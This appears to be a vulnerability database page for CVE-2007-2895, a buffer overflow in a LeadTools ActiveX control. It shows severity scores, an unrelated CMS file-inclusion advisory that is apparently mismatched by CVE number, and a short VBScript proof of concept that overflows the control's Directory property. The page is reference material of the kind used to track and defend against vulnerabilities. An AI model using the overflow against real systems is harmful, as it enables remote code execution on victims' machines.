CVE-2007-2895
published 2007-05-30CVE-2007-2895: Buffer overflow in a certain ActiveX control in LTRDF14e.DLL 14.5.0.44 in LeadTools Raster Dialog File Object allows remote attackers to execute arbitrary code…
PriorityP334high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
5.41%
91.7th percentile
Buffer overflow in a certain ActiveX control in LTRDF14e.DLL 14.5.0.44 in LeadTools Raster Dialog File Object allows remote attackers to execute arbitrary code via a long Directory property value.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lead_technologies | leadtools_raster_dialog_file_object | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Aprox CMS Engine 5.1.0.4 - Local File Inclusion
exploitdb·2008-06-21
CVE-2008-2895 Aprox CMS Engine 5.1.0.4 - Local File Inclusion
Aprox CMS Engine 5.1.0.4 - Local File Inclusion
---
01010111 01001001 01010010 01000101 01000100 01010011 ->
01000101 01000011 01010101 01010010 01001001 01010100 ->
01011001
ADVISORY: APROX CMS ENGINE V5(.1.0.4) LOCAL FILE INCLUSION (LFI)
|| 0x00: ABOUT ME
|| 0x01: DATELINE
|| 0x02: INFORMATION
|| 0x03: EXPLOITATION
|| 0x04: RISK LEVEL
|| 0x00: ABOUT ME
Author: SkyOut
Date: June 2008
Website: http://wired-security.net/
|| 0x01: DATELINE
2007-06-21: Bug found
2007-06-21: Advisory released
|| 0x02: INFORMATION
The Aprox CMS Engine in version 5 (tested in 1.0.4) is vulnerable to an attack
in the way of a Local File Inclusion (LFI).
The exploitation has been tested on a local webserver, using Apache HTTPD 2.2.8
+ MySQL 5.0.51a (XAMPP for Windows) on Windows Vista Premium.
-> htt
Exploit-DB
LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)
exploitdb·2007-05-24
CVE-2007-2895 LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)
LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)
---
2007/05/24
LeadTools Raster Dialog File Object (LTRDF14e.DLL v. 14.5.0.44) Remote Buffer Overflow Exploit
url: http://www.leadtools.com/
price: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
Sub tryMe
buff = String(4528, "A")
get_EDX = "aaaa"
buff1 = String(4528, "B")
egg = buff + get_EDX + buff1
test.Directory = egg
End Sub
# milw0rm.com [2007-05-24]
No writeups or analysis indexed.
http://moaxb.blogspot.com/2007/05/moaxb-24-leadtools-raster-dialog-file.htmlhttp://osvdb.org/36035http://secunia.com/advisories/25381http://shinnai.altervista.org/viewtopic.php?id=42&t_id=27http://www.securityfocus.com/bid/24133http://www.shinnai.altervista.org/moaxb/20070524/leaddfotxt.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/34478http://moaxb.blogspot.com/2007/05/moaxb-24-leadtools-raster-dialog-file.htmlhttp://osvdb.org/36035http://secunia.com/advisories/25381http://shinnai.altervista.org/viewtopic.php?id=42&t_id=27http://www.securityfocus.com/bid/24133http://www.shinnai.altervista.org/moaxb/20070524/leaddfotxt.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/34478
2007-05-30
Published